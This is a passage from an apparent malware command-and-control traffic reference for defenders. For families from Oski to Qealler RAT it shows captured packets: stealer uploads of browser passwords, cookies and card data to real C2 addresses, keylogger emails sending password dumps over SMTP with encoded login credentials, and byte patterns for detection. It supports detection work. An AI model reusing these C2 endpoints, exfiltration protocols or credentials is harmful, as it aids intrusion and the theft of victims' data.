..&UV^!UV^!UV^PK....................PK...........ZZP..*.#...&...". ....... .......autofill/Google Chrome_Default.txtUT...!UV^PK...........ZZP............-. ....... ...t...autofill/Mozilla Firefox_qldyz51w.default.txtUT...!UV^PK...........ZZP.............. ....... .......cc/Google Chrome_Default.txtUT...!UV^PK...........ZZP............!. ....... 
.......cookies/Google Chrome_Default.txtUT...!UV^PK...........ZZP..).........,. ....... ...q...cookies/Mozilla Firefox_qldyz51w.default.txtUT...!UV^PK...........ZZP8G.......... . ....... .......passwords.txtUT...!UV^PK...........ZZP.dwtv...T..... ....... .......screenshot.jpgUT...&UV^PK...........ZZP.pv.r... 2.. . ....... ...S...system.txtUT...&UV^PK...........ZZP.............. ....... ......._1.zipUT...&UV^PK...... . .....I.....
--1BEF0A57BE110FD467A--

HTTP/1.1 200 OK
Connection: Keep-Alive
X-Powered-By: PHP/7.2.26
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 26 Feb 2020 11:23:19 GMT
Server: LiteSpeed
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/oski1.png "Oski")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/oski2.png "Oski")

#### Ostap

~~~
POST /angola/mabutu.php?pi=29h&tan=cezar&z=662343339&n=0&u=20&an=9468863238 HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 1034
Host: 185.180.199.91

Microsoft Windows 7 Professional 6.1.7601*Locale:0409
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sent64.jse
USER-PC*DELL*DELL*0
System Idle Process*null
System*null
smss.exe*null
csrss.exe*null
wininit.exe*null
csrss.exe*null
winlogon.exe*null
services.exe*null
lsass.exe*null
lsm.exe*null
svchost.exe*null
svchost.exe*null
svchost.exe*null
svchost.exe*null
svchost.exe*null
svchost.exe*null
svchost.exe*null
spoolsv.exe*null
svchost.exe*null
svchost.exe*null
svchost.exe*null
dwm.exe*C:\Windows\system32\Dwm.exe
explorer.exe*C:\Windows\Explorer.EXE
taskhost.exe*C:\Windows\system32\taskhost.exe
SearchIndexer.exe*null
qemu-ga.exe*null
audiodg.exe*null
WmiPrvSE.exe*null
SearchProtocolHost.exe*null
windanr.exe*C:\Windows\system32\windanr.exe
OSPPSVC.EXE*null
wscript.exe*C:\Windows\system32\wscript.exe
wscript.exe*C:\Windows\system32\wscript.exe
SearchFilterHost.exe*null
WINWORD.EXE*C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WmiPrvSE.exe*null
~~~

~~~
https://51.83.206.98/1/1.php?g=m4&b=4a01758c&c=ACCOUNTDOMAIN@@LARRY-ACCOUNTIN@@Larry@@*172.16.0.2%3A%3A%5B00000001%5D%20Intel%28R%29%20Ethernet%20Connection%20I217-LM&233137
https://45.128.134.14/C821al/vc2Tmy.php?h=m2&j=4a01758c&l=ACCOUNTDOMAIN@@LARRY-ACCOUNTIN@@Larry@@*172.16.0.2%3A%3A%5B00000001%5D%20Intel%28R%29%20Ethernet%20Connection%20I217-LM&13742148
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-1.png "Ostap")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-2.png "Ostap")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-3.png "Ostap")

#### Ousaban (banker)

~~~
#PRINCIPAL##Convite##ConvitRC#<#>Windows 10 Pro<#>DESKTOP-JGLLJLD<#>Nao<#>Windows Defender#SocketMain#<#>723442#UploadFile##RECEBENDO#<#>DESKTOP-JGLLJLD#ON-LINE##strPingOk##ON-LINE##strPingOk##ON-LINE##strPingOk##PLUGIN#<#>Nao#ON-LINE##strPingOk##COMPLETOU#<#>DESKTOP-JGLLJLD
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ousaban.png "Ousaban")

#### Parallax RAT

~~~
00000000 04 c7 86 72 fd 82 d3 50 88 03 b3 9f bc 7f b1 f3 ...r...P ........
00000010 2f 44 27 83 80 9d ab d2 22 72 ff 33 88 8f 85 17 /D'..... "r.3....
00000020 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.
00000030 ed 48 fd 08 40 83 c2 36 c8 82 e4 50 6a f0 4e 9f .H..@..6 ...Pj.N.
00000040 8a 7f eb f3 42 44 64 83 c8 9d e1 d2 65 72 bc 33 ....BDd. ....er.3
00000050 fe 8e aa 17 b4 af 88 1e 16 c9 25 88 29 a6 6b 7e ........ ..%.).k~
00000060 26 95 4e d5 db 48 cc 08 3e d7 f8 0c 44 6e ff 59 &.N..H.. >...Dn.Y
00000070 79 dc 64 86 8b c1 cd a6 64 c0 da 77 bf 95 77 dd y.d..... d..w..w.
00000080 7c a0 d5 f0 71 34 56 b2 80 d8 1e b6 89 22 cf 8b |...q4V. .....".. 
00000090 55 e4 05 4b 7b 6d 07 ef 93 6d f2 f3 4d ee ee 23 U..K{m.. .m..M..#
000000A0 8f 26 b1 7d 98 34 ae e7 26 08 d4 e8 1d 28 21 2a .&.}.4.. &....(!*
000000B0 35 3b c6 0c 01 01 6c ed 54 a4 a0 2f a2 ef e0 1d 5;....l. T../....
000000C0 ce 34 b7 55 f8 2f fb 23 e9 50 cf e2 3a 35 50 bb .4.U./.# .P..:5P.
000000D0 85 04 0a 91 c3 91 64 54 52 63 1f 8a 41 3a 25 d9 ......dT Rc..A:%.
000000E0 bf da af 3b ea 73 0b 9c 1f 58 02 f2 97 83 10 7b ...;.s.. .X.....{
000000F0 96 4a 7a 57 8a 38 54 76 c9 fa 6a 41 25 8a 10 37 .JzW.8Tv ..jA%..7
00000100 03 52 d8 ca 85 2c 06 83 e3 ef 76 de 40 66 6c f0 .R...,.. ..v.@fl.
00000110 a2 68 39 9a ef 9e 7d 93 56 99 e9 2a .h9...}. V..*

00000000 04 c7 86 72 d6 82 d3 50 e5 a4 56 9f bc 7f b1 f3 ...r...P ..V.....
00000010 2f 44 27 83 80 9d ab d2 aa 2b f8 35 a0 8e 85 17 /D'..... .+.5....
00000020 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.
00000030 ed 48 fd 08 .H..

0000011C 04 c7 86 72 d7 82 d3 50 e5 a4 56 9f a0 89 20 f3 ...r...P ..V... .
0000012C 2f 44 27 83 80 9d ab d2 22 72 ff 33 02 8e 85 17 /D'..... "r.3....
0000013C fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.
0000014C ed 48 fd 08 fe 7c 59 c9 91 82 ba 50 4d f0 4b 9f .H...|Y. ...PM.K.
0000015C cf 7f c5 f3 5d 44 46 83 f4 9d c4 d2 50 72 c5 33 ....]DF. ....Pr.3
0000016C b4 8e c6 17 c7 af 95 1e 09 c9 01 88 1e a6 43 7e ........ ......C~
0000017C 00 95 0c d5 9e 48 a1 08 7f d7 b1 0c 05 6e b9 59 .....H.. .....n.Y
0000018C 2b dc 09 86 b8 c1 00 59 c7 3f ee 1e bc f1 7c aa +......Y .?....|.
0000019C 21 80 87 d0 59 46 5c d4 e5 ab 92 20 19 b3 ae e7 !...YF\. ... ....
000001AC 75 e4 05 4b 7b 6d u..K{m

00000034 04 c7 86 72 d5 82 d3 50 23 f0 22 9f bc 7f b1 f3 ...r...P #.".....
00000044 2f 44 27 83 80 9d ab d2 22 72 ff 33 a0 8e 85 17 /D'..... "r.3....
00000054 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.
00000064 ed 48 fd 08 .H..
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parallax.png "Parallax")

#### ParasiteHTTP Loader

~~~
POST /index.php HTTP/1.1
Accept: */*
Host: 80.233.134.242
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 280
Cache-Control: no-cache

BF6472F6DC3=Pi5tSiBItP-2ZyuFJlr31Jp58O0HzR74v0b4l2HaoHH537FeTxgg-msYkTvX6SSJ8FswUtoTg4O86o2HyWec2zuU6VFzTwgaFYw_28nFRIqcJv8TqrV7SYgFKSpbqY8aZhEcHY982M_flvAHMCjsD8-fxezzV5BSBDBbfYb5WZvBrsbJVlPwXYFmETrm7CrWF5LwvEFhu1Ecp14ymv1xPoCG0vfqAv5tsUn0H7mA5R5g7HAo2c3_r9fuZUtw9CKD46G2JnBF-A==

HTTP/1.1 200 OK
Date: Tue, 28 May 2019 08:46:26 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.37
X-Powered-By: PHP/5.6.37
Set-Cookie: PHPSESSID=s3l4jdfsc8nkjghcevlshn3d67; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 416
Connection: close
Content-Type: text/html; charset=utf-8

8jQG4riRhJFWMlJ9RTKeV7k45+I3REM8JjIIBZ2ttxzjDFxOX7VjxuypIrJn9cQ1ZMg6fvgWSSpto3sivUfvUCHWLzb2ljPhPugPTYb0KsgResnAIFl+aoqF5m9bCyBd6PMoRLdOdsuDW+E3wrb7ZNpApXlX2htDZRNhaqfST8eBE9Cvl7H0vyUzY+BfH5M4fvvt71DCRt2OP31tgu7aMMxM0mUWvBBZcNpeZzLRdMFd0Ea1u3oM+vLWrhFLYGuCWN6TPaqlEpw/9pgLUI8BhxUYFOJvyTRIFwXmlQPWMY6qg0/l+b5Ha+SYCnLtw8Uyqilil+OBM+KM5MT4C4l9vkXsv/ID9X8ZRr2l9cHzlW5J7sLVrGeH26KmBrjqBM3c4Ini4VTZZCr5KDrsRpi21NaheQLGLA==
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasitehttp.png "ParasiteHTTP Loader")

#### Parasite Stealer aka Nexus

~~~
POST /gate.php HTTP/1.1
Content-Type: application/octet-stream;
User-Agent: Client
Host: 193.168.3.101
Content-Length: 1216583
Cache-Control: no-cache

{846ee340-7039-11de-9d20-806e6f6e6963}~;^;Windows 7 Professional x64~;^;1.0~;^;0~;^;0~;^;0~;^;0~;^;0~;^;8~;^;PK.........q?P..&.?....... ...about.logUT ..m.4^m.4^m.4^.U]..@.}.
..>j6...?.J.Z7K!....0,....au..;.6u.....s...\?......J.CP...%....wz..........,#][F.p...]d...8X.`...[a... .....{.A.A.-.}....e....o]...H`.."......o3...&x+H.k......6x.tM....E.r..H.... Ls\f.....`.......].h\.....4.1..V.W%X.D.....3Y....9.u,ch......$i..Ps........J.uN.%...........y...8.QF7.... .!.........d.8...d;&.....................l.m7....w...1.3......r.. {.i.....}Lr5h.w..8eB._..w.LJp..9....+..]....T.6-..o..-f7.Q.z;...<..W.%.pA.......Q..d.o..""".-xD`)..F=..]..*..I.s0...-..P*.1.I..2N....!..\...5....IB..(O....u..Z......=....}.$.?;7Lt....)."/Y...o5.$..e....G'U....xrB..PK..........?P............ ...Browsers/UT ..`.5^`.5^`.5^PK.........q?PX.eS.P...P......Grabber.zipUT....... .......about.logUT...m.4^PK............?P............ . ..........Aw...Browsers/UT...`.5^PK...........q?PX.eS.P...P.... ....... .......Grabber.zipUT...n.4^PK...........q?P.ci..:...|.... ....... ....S..screen.jpegUT...m.4^PK....................

HTTP/1.1 200 OK
Date: Fri, 31 Jan 2020 21:13:48 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasite1.png "Parasite stealer")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasite2.png "Parasite stealer")

#### Phoenix Keylogger

~~~
220 us2.outbound.mailhostbox.com ESMTP Postfix
EHLO User-PC
250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login dGhiQHRiaC10dy5jb20=
334 UGFzc3dvcmQ6
d2Fzc29kZWRvbjIy
235 2.7.0 Authentication successful
MAIL FROM:
250 2.1.0 Ok
RCPT TO:
250 2.1.5 Ok
DATA
354 End data with .
MIME-Version: 1.0
From: thb@tbh-tw.com
To: thb@tbh-tw.com
Date: 1 Nov 2019 14:38:03 +0000
Subject: PX | PSWD | Client Name: admin
Content-Type: multipart/mixed; boundary=--boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0

----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

|------- Phoenix Keylogger - Passwords -------|=0D=0A+-----------=
-- Client INFO -------------+=0D=0AIP: 81.17.242.238=0D=0AHWID: 1=
78BFBFF000506E3=0D=0AOwner Name: USER-PC=0D=0AFull OS Name: Micro=
soft Windows 7 Professional =0D=0AOS Platform: Win32NTOS Version:=
6.1.7601.65536=0D=0ASystem Boot Mode: Normal=0D=0APhysical Memor=
y: 3.25 GB Available Of 4.09 GB =0D=0AVirtual Memory: 1.85 GB A=
vailable Of 2.04 GB =0D=0ADate: 11/1/2019 2:37:59 PM=0D=0A-------=
----------------------------------=0D=0A
----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0
Content-Type: application/octet-stream; name="PXRecoveries | 11/1/2019 2:38:00 PM.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment

77u/PT09PT09PT09PT09Q2hyb21lPT09PT09PT09PT09PT0NCkhvc3Q6IGh0dHBzOi8v
d3d3LmZhY2Vib29rLmNvbS8NClVzZXJuYW1lOiBob25leUBwb3QuY29tDQpQYXNzd29y
ZDogaG9uZXlwYXNzMzU2DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KID09
PT09PT09PT09PU91dExvb2s9PT09PT09PT09PT09PQ0KSG9zdDogMTkyLjE2OC4xLjEN
ClVzZXJuYW1lOiBob25leUBwb3QuY29tDQpQYXNzd29yZDogaG9uZXlwYXNzMzU2DQo9
PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIA==
----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0--
.
250 2.0.0 Ok: queued as 7CDF2181E51
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/phoenix.png "Phoenix")

#### Plugx

~~~
POST /update?wd=b0b9d49c HTTP/1.1
Accept: */*
x-debug: 0
x-request: 0
x-content: 61456
x-storage: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Host: 185.239.226.61:8080
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
~~~

~~~
............?PEOJNOOBAAHDMKNGELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com....
.............?JJIOHDOBJEIEIBJJELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com....
.............?DBCGBLOBDMGFEIEMELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com....
.............?JJIOHDOBJEIEIBJJELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..A......... :...Q.
............?PEOJNOOBAAHDMKNGELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..2......... :...Q.
............?DBCGBLOBDMGFEIEMELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..2......... :...Q.
~~~

~~~
GET /EF003AAB6425775CD949B40C HTTP/1.1
Accept: */*
Cookie: QhTbeUW+YzYYsZWz0PQvBvYIgo8=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: WOUDERFULU.impresstravel.ga
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 203
Server: nginx
Date: Tue, 03 Sep 2019 14:37:02 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 660
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Server: ip-172-31-28-245
Set-Cookie: JSESSIONID=4618E9008B004BEE8FE5C81AB063A332; Path=/; HttpOnly
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-1.png "Plugx")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-2.png "PlugxDNS")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-3.png "Plugx")

#### Pony

Follow the TCP stream, not the HTTP stream, in Wireshark.

~~~
POST /mlu/forum.php HTTP/1.0
Host: spausence.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 369
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

..|Rk.. ."6d0..)/.....Lo..l{;..:.NJT;.G..3P..n...{.i..eLX..j...K.N.......A. n.%.....r..&..........J.l.V..of..T..V$... .L...5....6F...9.)......(... .(O........*[z\.....N....=..4..];....L.W......Q...*.S....V. 7.4.L..v..oi...x..W7....{.....V)...:...1...R..V.......+...]m .......B...|D..t.Y.{..............{W.f.._i...i.!..d.C...r.......A.,.z....ta..m.. 5!...w+.....p....!0

HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 03 Oct 2019 17:17:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.45

.. .....f>k.X.......
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pony.png "Pony")

#### Pony Loader

~~~
POST /eng/gate.php HTTP/1.0
Host: www.jicago-jp.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 199
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 08:44:06 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8

STATUS-IMPORT-OK
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pony-loader.png "Pony Loader")

#### Predator Pain Keylogger

~~~
From: pain@globalfinancel.com
To: pain@globalfinancel.com
Date: 17 Oct 2019 08:04:48 -0700
Subject: Predator Pain v13 - Server Ran - [XRWJAM272278424]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

This is an email notifying you that XRWJAM272278424 has ran your =
logger and emails should be sent to you shortly and at interval c=
hoosen.=0D=0A =0D=0APredator Logger Details: =0D=0AServer Name: R=
egSvcs.exe=0D=0AKeylogger Enabled: False=0D=0AClipboard-Logger En=
abled: False=0D=0ATime Logs will be delivered: Every 60 minutes=0D=0A=
=0D=0AStealers Enabled: True=0D=0ATime Log will be delivered: Av=
erage 2 to 4 minutes=0D=0A =0D=0ALocal Date and Time: 10/17/2019 =
8:04:41 AM=0D=0AInstalled Language: en-US=0D=0AOperating System: =
Microsoft Windows 7 Professional =0D=0AInternal IP Address: 192.1=
68.180.170=0D=0AExternal IP Address: =0D=0AInstalled Anti-Virus: =
=0D=0AInstalled Firewall:=20
.
250 OK id=1iL7Kv-003iIX-Hl
From: pain@globalfinancel.com
To: pain@globalfinancel.com
Date: 17 Oct 2019 08:05:04 -0700
Subject: Predator Pain v13|Stealer Log - [XRWJAM272278424]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

********************************=
**************=0D=0A Operati=
ng System Intel Recovery=0D=0A **=
********************************************=0D=0ACPU Name: XRWJA=
M272278424=0D=0ALocal Date and Time: 10/17/2019 8:04:55 AM=0D=0AI=
nstalled Language: en-US=0D=0ANet Version: 4.0.30319.42000=0D=0AO=
perating System Platform: Win32NT=0D=0AOperating System Version: =
6.1.7601.65536=0D=0AOperating System: Microsoft Windows 7 Profess=
ional =0D=0AInternal IP Address: 192.168.180.170=0D=0AExternal IP=
 Address: =0D=0AInstalled Anti-Virus: =0D=0AInstalled Firewall: =0D=0A=
********************************=
**************=0D=0A WEB Bro=
wser Password Recovery=0D=0A ****=
******************************************=0D=0A=0D=0A =
*******************************************=
***=0D=0A Mail Messenger Passw=
ord Recovery=0D=0A **************=
********************************=0D=0A=0D=0A =
**********************************************=0D=0A =
Internet Download Manager Reco=
very=0D=0A **********************=
************************=0D=0A **=
********************************************=0D=0A =
Jdownloader Password Recovery=0D=0A =
***************************************=
*******
.
250 OK id=1iL7LE-003ina-5V
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/predatorpain.png "Predator Pain Keylogger")

#### Predator the Thief

~~~
POST /api/check.get HTTP/1.1
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.906.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Host: 95.215.205.56
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 20:05:42 GMT
Server: Apache
Set-Cookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404; expires=Thu, 10-Oct-2019 20:05:42 GMT; Max-Age=86400; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 132
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

nr8uEQylGUpuY0Qjyde/Fn3TGzRg6JFXvSXGhXxBL0Ls2eMYLaWSpJIvp6bRuCqmkclDgfyfYtc7/hQGxqKlJiPdCQ0v/JyN12lNiho7IjBLW3VB02orxGMXTr04WaAQz73q

POST /api/gate.get?p1=2&p2=5&p3=0&p4=2&p5=0&p6=0&p7=0&p8=0&p9=0&p10=udh8T1P6VQh1ZF9DgIniQjWRSWBTqqYq5k2u HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.906.121 Safari/537.36
Host: 95.215.205.56
Content-Length: 6028
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404

-----------------------------228
Content-Disposition: form-data; name="file"; filename="s7q3q0u1v7q3q0u1v7.zip"
Content-Type: application/octet-stream

PK..........IO................Outlook/UT ...K.].K.].K.]PK..........IOo...?...F.......Outlook/Outlook.txtUT ...K.].K.].K.]s.M...R...K.t(./.K..e.. H,.../J.......f@.`...+.CK#=C3.=C=C../..PK..........IO................General/UT ...K.].K.].K.]PK..........IO................Cookies/UT ...K.].K.].K.]PK..........IO................History/UT ...K.].K.].K.]PK..........IO................Other/UT ...K.].K.].K.]PK..........IOa.qZ............History/Chrome_0.txtUT ...K.].K.].K.].V[k.8.~..?.............B...>..,{D4.V....?..e..4M.M...`....s...O....3..b%....0. 7.'_.;s6.H}6.kZ.Fz........i...aZ...".".v.P.x>PR.[.D...$Q..."...% f...Y.[.V.......G.*"...Ig..Y...k=}..}..U....@....T..n.-)7Z.Yt..%...$.P.vQ....p.z..&..t...P[...w...T....6A..!k...:...V...Fp.....-.a.....7......_.X...E../;..T8..7.I..)Y..(..,....)JP..........nf..g..E.\..(..@..XQ.l....".e..a.X .H.?*.".a.F9`..~zrzr.. .M...... .
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/predator.png "Predator")

#### Proyecto (aka Nemours) RAT

~~~
0|New - 25-10-19/21:41|United States|USER-PC - admin|Windows 7 Professional - 32 Bits / Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz / 4 / / 0|US|0|192.168.100.60|0 Cap.|oolkth|9090|OFF| - 0 / || Tiene Capturas de: |New - |||No Available 13|Program Manager|OFF|OFF - 0 / ||
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/proyecto.png "Proyecto")

#### Pyrogenic

Flag on "53 E1 6D D3 9E EE 45 D4" on the initial connection, 175 bytes.

~~~
00000000  53                                                S
00000001  e1 6d d3 9e ee 45 d4 ad 26 96 67 86 36 fb f7 cc   .m...E.. &.g.6...
00000011  3f 15 13 b7 cf 5e 99 ac dc 9d e6 36 cd 61 bd 91   ?....^.. ...6.a..
00000021  37 5c db a0 15 ec f4 5a 9a 63 96 7f 2b e6 b3 3c   7\.....Z .c..+..<
00000031  96 a9 aa fe d6 37 6d f5 1d 57 8f 26 f1 03 a4 7a   .....7m. .W.&...z
00000041  7b d9 5f 01 8c 5e 87 c5 de 80 a2 52 15 24 e0 73   {._..^.. ...R.$.s
00000051  51 70 b4 6f 60 7c a8 4c df 36 ac df 96 b3 18 b5   Qp.o`|.L .6......
00000061  54 37 74 9b d1 60 06 f1 46 b2 8f e2 23 f2 58 80   T7t..`.. F...#.X.
00000071  de d9 8d d9 10 35 91 7f d9 74 4b 6e 05 4c 13 9f   .....5.. .tKn.L..
00000081  68 85 65 d0 bb f6 67 0c 78 ae 12 b6 ab 89 90 14   h.e...g. x.......
00000091  e0 47 c5 56 c9 e0 0f 17 73 95 ee 30 08 fa 0e 47   .G.V.... s..0...G
000000A1  cd ec dd 72 db e7 ff bf b9 57 b3 61 c4 cb 4c      ...r.... .W.a..L
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pyrogenic.png "Pyrogenic")

#### Qbot

The URL is usually /t3.

~~~
POST /t3 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 174.48.72.160
Content-Length: 215
Cache-Control: no-cache

ycgizbarun=8e5ygoO+WS2h/ypd2ZEi8nHeEKPFyrdKrXgLyQd6Gi76j4KxXuMEm2K/lEHrTJqqWdDWXZQWcLyTbSnECgNFerjMjb9ittXV+rg/yqpLMLtOWYw6pCz2nDkPbGnUW3Z61/yZoSoh9zdJzkpTmYMCloxmblZ9Eos4QZHsiMecjlcmNjwU1D/9ShQ6cGKSJxHNVT2lNGCykNU=

HTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 41

ParseHttpResponse() failed pCurlResp=NULL
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qbot.png "Qbot Qakbot")

#### Qealler RAT

~~~
........t.]{"serverPath":"C:\\Users\\Jonathan\\Desktop\\PO6671.jar","securityRetry":20,"vbox":false,"serverVersion":"v2.0.0","mainPath":"C:\\Users\\Jonathan\\QkpCj","nickName":"14TH TWETWE APRIL","vmware":false,"encryptKey":"NnKHsguoUsbJwLwumvSXFoiWR","operatingSystem":{"osDefaultArch":"amd64","country":{"code":"us","name":"United States"},"icon":"windows7","admin":true,"language":"English (United States)","type":1,"processor":2,"osDefaultName":"Windows 7","computerUser":"Jonathan","javaArchitecture":"amd64","computerName":"JONATHAN-PC","name":"Windows 7 Professional","osDefaultVersion":"6.1","jreVersion":"1.8.0","architecture":"amd64","ram":"3 GB"},"uuid":"7094850e-92de-4eed-b492-65d966bc00b5lumteifxDUDU","command":1,"network":[{"delay":2,"port":4424,"dns":"marketingsiamgrains.zapto.org"}],"jrePath":"C:\\Users\\Jonathan\\Oracle\\bin\\javaw.exe","userTitle":"Jonathan@JONATHAN-PC","security":[{"process":["UserAccountControlSettings.exe"],"code":"user-account-control","reg":[{"value":"\"ConsentPromptBehaviorAdmin\"=dword:00000000\r\n\"ConsentPromptBehaviorUser\"=dword:00000000\r\n\"EnableLUA\"=dword:00000000\r\n\"PromptOnSecureDesktop\"=dword:00000000\r\n","key":"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","valuesCommand":[]}],"name":{"en":"User Account 